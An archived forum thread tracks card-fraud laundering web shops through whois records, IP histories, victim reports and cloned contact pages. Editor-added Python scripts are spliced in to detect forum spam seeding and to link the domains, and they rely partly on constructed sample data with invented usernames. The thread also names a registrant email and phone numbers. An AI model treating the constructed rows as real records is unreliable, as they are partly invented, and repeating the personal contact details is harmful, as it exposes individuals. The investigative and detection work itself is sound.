One of the OCS's new tangible theme card fraud laundering entities unmasked in the past week while in its infancy was SUPPATOYS.COM 303-261-8619, a product of the SANTAREX TOYS recruitment campaign:

As usual, a DIRECTI bogus domain registration:


Registration Service Provided By:
HIGH QUALITY HOST COMPANY
Contact: +1.6462130098

Domain Name: SUPPATOYS.COM

Registrant:
HERRING llc.
ARTHUR HERRING (nortonbjstove@hotmail.com)
cowpath rd. 358
lansdale
Pennsylvania,19446
US
Tel. +178.9756342

Creation Date: 26-Nov-2009
Expiration Date: 26-Nov-2010

Domain servers in listed order:
ns2.r01.ru
ns1.r01.ru

Server Type: Apache/2.2.3 (Linux/SUSE)
IP Address: 195.24.66.108
IP Location: - Moskva - Moscow - Garant-park-telecom
Response Code: 200
Domain Status: Registered And Active Website

IP Address History SUPPATOYS.COM


Event Date Action Pre-Action IP Post-Action IP
==========================================================
2009-12-03 New -none- 213.155.7.168 Ruslan Zhavrud Ukraine
2009-12-13 Change 213.155.7.168 213.155.7.172 Ruslan Zhavrud Ukraine
2010-02-15 Change 213.155.7.172 213.155.25.172 Ruslan Zhavrud Ukraine
2010-02-25 Change 213.155.25.172 195.24.66.108 (Moscow State University)


The first and so far only reports of fraud charges are coming from victims in the UK posting on the UK moneysavingexpert.com forum:

quote:
05-04-2010, 6:29 PM #1
alibongo42
MoneySaving Stalwart

Weird credit card transaction

I have just discovered a small value credit card transaction that I don't believe I actioned. I need to wait until tomorrow to call my card company, but having done a bit of research, it seems really weird. I wanted to canvas opinion and see if anyone has heard of anything like this.

The transaction was on 16 Mar 10, and is for £6.19 and came from "WWW SUPPATOYS COM". Turns out this was a US transaction, converted from dollars. I have not been in the US since Jan, and did not use this card there. I also don't recall making any online transactions that would fit.

The website is a blank page. Nothing interesting when I view the source code either. When I ping the IP address, it belongs to somewhere in Russia.

On googling the website, it is listed as the homepage for a variety of usernames on a variety of forums (spanning a vast array of topics). In each case, the user has only registered from 23rd - 26th March 10, and made only one post. The posts are coherent, but usually have no significance to the subject of the forum. In some cases the user has a status of BANNED. The most common username is MSMILLER36.

I can find no online reference to anyone else commenting on potentially fraudulent activity from this site.

Has anyone heard of anything like this before? Even if my card company change my card, I will still be curious as to what this is all about!

================================================================

05-04-2010, 7:56 PM #3
Wml
MoneySaving Newbie

Another weird card transaction

Hello, I too have a transaction from www suppatoys com, like you I know I didn't make this transaction and have had my card blocked!
The transaction was on 17th March and was for £7.01, also converted from US dollars. Looks like someone is setting up a nice big scam!!!!!

================================================================
05-04-2010, 9:03 PM #8
alibongo42
MoneySaving Stalwart

Card now stopped, and I'm not the first customer to have called with the same query!


Ref:»forums.moneysavingexpert.com/sho···31598811

Interestingly, and as noted by the first victim who posted on moneysavingexpert.com, there are numerous SEO seeding with forum posts using "suppatoys.com 303-261-8619" as a signature:





Ref:»www.google.com/search?hl=en&q=su···gs_rfai=

If you are wondering about the apparently native English skills of the seed postings, which in the past have been documented as originating from IP addresses in both Moldova and the Russian Federation, it is because they copy and paste postings from other forums.

An observant analysis will conclude that there was an intentional fraud processing run of known UK card data, because unlike past SEO forum post seeding, some of these appear to intentionally target UK based forums. In addition, the fact that some of the posts were originally copied from UK forums can be derived from the EU spelling of "favorite" in this subject title "Your favourite toy of your childhood?"

Once again, smart ... but not smart enough !!

MGD
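The first victim above found the seeding pattern by hand: many usernames, each registered within a few days, each with a single post, each with the fraud domain as its homepage. As an added example (not part of the original post), the script below applies that rule to a constructed forum member export: accounts are grouped by the domain in their homepage field, and a domain is flagged when at least `min_accounts` low-activity accounts registered inside any `window_days` span. The CSV layout, the thresholds and the sample rows (built from the usernames, dates and countries mentioned in this thread, with names other than MSMILLER36 invented) are the editor's assumptions, not a real forum's export.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed member export in the shape a forum admin might pull. Rows follow
# the pattern the victim described: one post each, registered over a few days,
# geo-located to Moldova, homepage set to the fraud domain.
SAMPLE_MEMBERS = """\
username,registered,posts,homepage,geo_country,status
msmiller36,2010-03-23,1,http://suppatoys.com,MD,active
toyfan_kate,2010-03-24,1,http://www.suppatoys.com/,MD,banned
rick_d,2010-03-25,1,suppatoys.com,MD,active
jane_plays,2010-03-26,1,http://suppatoys.com/index.html,MD,active
oldtimer,2004-02-11,812,http://example.org,GB,active
ann_h,2009-11-02,41,http://example.org,GB,active
newbie77,2010-03-24,0,,GB,active
"""


def homepage_domain(url):
    """Reduce a homepage field to a bare host so URL variants group together."""
    url = (url or "").strip().lower()
    if not url:
        return ""
    if "://" not in url:
        url = "http://" + url
    host = urlsplit(url).hostname or ""
    return host[4:] if host.startswith("www.") else host


def seeding_report(csv_text, window_days=7, min_accounts=3, max_posts=1):
    """Group low-activity accounts by homepage domain and flag registration bursts."""
    by_domain = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        domain = homepage_domain(row["homepage"])
        if not domain or int(row["posts"]) > max_posts:
            continue  # established members and accounts with no homepage are not seeds
        by_domain[domain].append(row)

    report = {}
    window = timedelta(days=window_days)
    for domain, rows in by_domain.items():
        dates = sorted(datetime.strptime(r["registered"], "%Y-%m-%d") for r in rows)
        # Sliding window: largest number of registrations inside any window_days span.
        burst, start = 0, 0
        for end in range(len(dates)):
            while dates[end] - dates[start] > window:
                start += 1
            burst = max(burst, end - start + 1)
        report[domain] = {
            "accounts": len(rows),
            "burst": burst,
            "first": dates[0].date().isoformat(),
            "last": dates[-1].date().isoformat(),
            "countries": sorted({r["geo_country"] for r in rows}),
            "usernames": sorted(r["username"] for r in rows),
            "flagged": burst >= min_accounts,
        }
    return report


if __name__ == "__main__":
    days = 7
    for domain, info in seeding_report(SAMPLE_MEMBERS, window_days=days).items():
        mark = "SEEDING?" if info["flagged"] else "ok"
        print(f"{mark:9} {domain}: {info['accounts']} accounts, {info['burst']} within "
              f"{days} days ({info['first']}..{info['last']}), countries {info['countries']}")
```

The same report, run over the signature field instead of the homepage field, catches the "suppatoys.com 303-261-8619" signature seeding shown in the search results above. A forum that keeps registration IP addresses can add a per-domain list of source networks to the report; a single /24 behind a dozen one-post accounts that all link the same domain is the strongest signal of all.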

MGD
Premium,MVM
join:2002-07-31
kudos:9

2 edits

reply to nobounds

said by nobounds:

said by MGD:

Amazing how the OCS manages to routinely dig up such small hosting providers around the globe. I doubt there are more than 80 to 100 domains total served by kayotex.net.
Pretty good ballpark guess, I'd say. I found 77 domains in .com/.org/.net/.biz using the kayotex.net nameservers (including kayotex.net itself). Almost all of the ones I spot checked are in Russian. One kind of interesting exception is taconsult.biz.
Interesting for sure, I have mentioned before that as one shadows this global operation you will frequently bump against online drug pharma, porn, and various financial related entities. Often wondering, then sometimes taking detours to research and see if some of the tangent entities that share the same tiny corner of cyberspace do so out of sheer random coincidence, or not. The domain you just pointed out is another in that chin-scratching variety where one ponders the odds of coincidence.

You cannot help but wonder when you see four frequently mentioned countries in this thread: Russia, Belarus, Ukraine and Moldova, all listed:



»taconsult.biz/en/about/

For example, for many months the advance search engine seeding of the fraud domains to prevent victim complaints from surfacing was traced to IP addresses in and around Chisinau, the capital of Moldova. Even though one can find LinkedIn profiles associated with the above domain, and they appear legit, one still wonders how it happened to end up sharing a minuscule DNS. It would not be unrealistic to estimate that a dozen or more experts could spend the better part of a year or two just examining all the tangent angles from the core of this operation.

In keeping with the random, minuscule and isolated DNS / hosting providers, FULLYDIGISTORE.COM is now known, thanks to info from wreave, to be operating out of San Jose, California. A noteworthy location, in that it is less than 150 miles to the northwest of one of the currently most prolific fraud charging entities, VPNMONSTER.COM, operating out of Fresno, California. A genetic clone, code wise, of FULLYDIGISTORE.COM is the newly discovered SCAM FRAUD = USTECHTODAY.COM 209-710-5237 = FRAUD SCAM »ustechtoday.com


»ustechtoday.com
Snapped 2010-11-16 18:50:43


Not only does it share the identical code and contents with altered graphics and theme as FULLYDIGISTORE.COM, in keeping with DrStrange's research, it also shares the same area code and city prefix:

============================
Contact Us

If you have any problems, comments or suggestions, please feel free to contact us. We will reply within 24 hours during regular business days.

Phone : 209-710-5385

E-Mail : support@fullydigistore.com

Business Hours: Mon-Fri 8:00am to 5:00pm Central Time Zone

New Ticket Submission Form
We are always ready and available to answer your questions and to provide quick resolutions to your problems. Just contact us. Message Details


»fullydigistore.com/contact_us.php
Snapped 2010-11-16 18:50:30

==============================

Contact Us

If you have any problems, comments or suggestions, please feel free to contact us. We will reply within 24 hours during regular business days.

Phone : 209-710-5237

E-Mail : support@ustechtoday.com

Business Hours: Mon-Fri 8:00am to 5:00pm Central Time Zone

New Ticket Submission Form
We are always ready and available to answer your questions and to provide quick resolutions to your problems. Just contact us. Message Details


»ustechtoday.com/contact_us.php
Snapped 2010-11-16 18:50:17

==============================

Though currently hosted with a Moscow based provider, it is using a minimalist DNS which only covers a few dozen hosts:


Registration Service Provided By:
HIGH QUALITY HOST COMPANY
Contact: +1.6462130098

Domain Name: USTECHTODAY.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected,
visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 07-Apr-2010
Expiration Date: 07-Apr-2011

Domain servers in listed order:
ns1.m-hoster-1.ru
ns2.m-hoster-1.ru


=======================
Server Type:Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
IP Address: 178.162.163.99
IP Location: - Russian Federation - Rustelekom Llc.
Obshestvo S Ogranichennoj
Response Code: 200
Domain Status: Registered And Active Website
=======================

Registered since April 2010 and identically cloaked as its sibling, with around 43 domains serviced by that DNS: »www.robtex.com/dns/m-hoster-1.ru.html#shared. I have not yet pulled a history to see if it was always cloaked since birth.

One can trace the same genetic source code to a third fraud website, recently defunct: XMAXELECTRO.COM. Though Google has cached copies due to a non-blocking robots.txt file at some point, it did not cache the contact us page and preserve a phone number. We can however pull Google's cached copy of a fake website product:
>http://xmaxelectro.com/product_info.php?products_id=19061

which is available here: »webcache.googleusercontent.com/s···nk&gl=us



You can insert the other two domains in the identical path structure to obtain the identical corresponding item on the other two card fraud laundering websites:

>http://xmaxelectro.com/product_info.php?products_id=19061

>http://fullydigistore.com/product_info.php?products_id=19061



>http://ustechtoday.com/product_info.php?products_id=19061



Once again, XMAXELECTRO.COM:


Registration Service Provided By:
HIGH QUALITY HOST COMPANY
Contact: +1.6462130098

Domain Name: XMAXELECTRO.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected,
visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 23-Jun-2010
Expiration Date: 23-Jun-2011

Domain servers in listed order:
ns1.adiba.ru
ns2.adiba.ru


=======================
Server Type:Apache
IP Address:83.133.126.92
IP Location: - Germany - Greatnet New Media
Response Code:403
Domain Status:Registered And Active Website
=======================

Robtex shows only about 8 domains using the NS of adiba.ru: »www.robtex.com/dns/ns1.adiba.ru.html#shared

There are significant patterns, digital fingerprinting, cyberlogical profiles, etc., that one can build from the behavior patterns of this operation.

MGD
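As an added illustration of the pivoting described in the post above (shared nameserver zone, shared whois contact numbers, same phone area code and exchange, identical contact-page template), here is a small Python script that is not from the post or from dslreports: it links the three storefronts from the values quoted in the post. The contact-page wording is reconstructed from the two quoted snapshots, "toy-shop.test" is a constructed control record, and the field names and the "two shared signals" threshold are my own assumptions.

```python
import hashlib
import re
# Contact-page wording quoted in the post; only the phone and e-mail differ between the two snapshots.
PAGE = ("Contact Us If you have any problems, comments or suggestions, please feel free to "
        "contact us. We will reply within 24 hours during regular business days. Phone : "
        "{phone} E-Mail : {email} Business Hours: Mon-Fri 8:00am to 5:00pm Central Time Zone")

# Pivots transcribed from the post (None = not given there); ns is the nameserver zone,
# reg_contact/reg_tel the registrar and registrant phones from whois. toy-shop.test is a constructed control.
RECORDS = {
    "fullydigistore.com": dict(ns=None, reg_contact=None, reg_tel=None, phone="209-710-5385",
        page=PAGE.format(phone="209-710-5385", email="support@fullydigistore.com")),
    "ustechtoday.com": dict(ns="m-hoster-1.ru", reg_contact="+1.6462130098", reg_tel="+45.36946676",
        phone="209-710-5237", page=PAGE.format(phone="209-710-5237", email="support@ustechtoday.com")),
    "xmaxelectro.com": dict(ns="adiba.ru", reg_contact="+1.6462130098",
        reg_tel="+45.36946676", phone=None, page=None),
    "toy-shop.test": dict(ns="toy-shop.test", reg_contact="+1.0000000000", reg_tel="+1.0000000000",
        phone="555-010-0001", page="Contact Us Call 555-010-0001 or mail help@toy-shop.test"),
}

def template_hash(page):
    # Strip per-site tokens (phone, e-mail) and normalise case/whitespace so clones collapse to one hash.
    if page is None:
        return None
    text = re.sub(r"\b\d{3}-\d{3}-\d{4}\b", "<PHONE>", page)
    text = re.sub(r"[\w.+-]+@[\w.-]+", "<EMAIL>", text)
    text = re.sub(r"\s+", " ", text).strip().lower()
    return hashlib.sha256(text.encode()).hexdigest()[:12]

def shared_signals(a, b):
    # Names of the pivots two domains have in common; unknown (None) fields never match.
    ra, rb, sig = RECORDS[a], RECORDS[b], set()
    for key in ("ns", "reg_contact", "reg_tel"):
        if ra[key] and ra[key] == rb[key]:
            sig.add(key)
    if ra["phone"] and rb["phone"] and ra["phone"][:7] == rb["phone"][:7]:
        sig.add("phone_prefix")  # same area code and exchange, e.g. 209-710
    if template_hash(ra["page"]) and template_hash(ra["page"]) == template_hash(rb["page"]):
        sig.add("template")
    return sig

def linked_domains(seed, min_signals=2):
    # Walk the pivots transitively: a domain sharing >= min_signals with any linked domain joins the set.
    found, queue = {seed}, [seed]
    while queue:
        cur = queue.pop()
        for other in RECORDS:
            if other not in found and len(shared_signals(cur, other)) >= min_signals:
                found.add(other)
                queue.append(other)
    return sorted(found)
```

Here xmaxelectro.com joins the cluster only through ustechtoday.com (shared whois numbers), not through fullydigistore.com, which is exactly the chain the post walks.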

over 13.5 years online © 1999-2013 dslreports.com.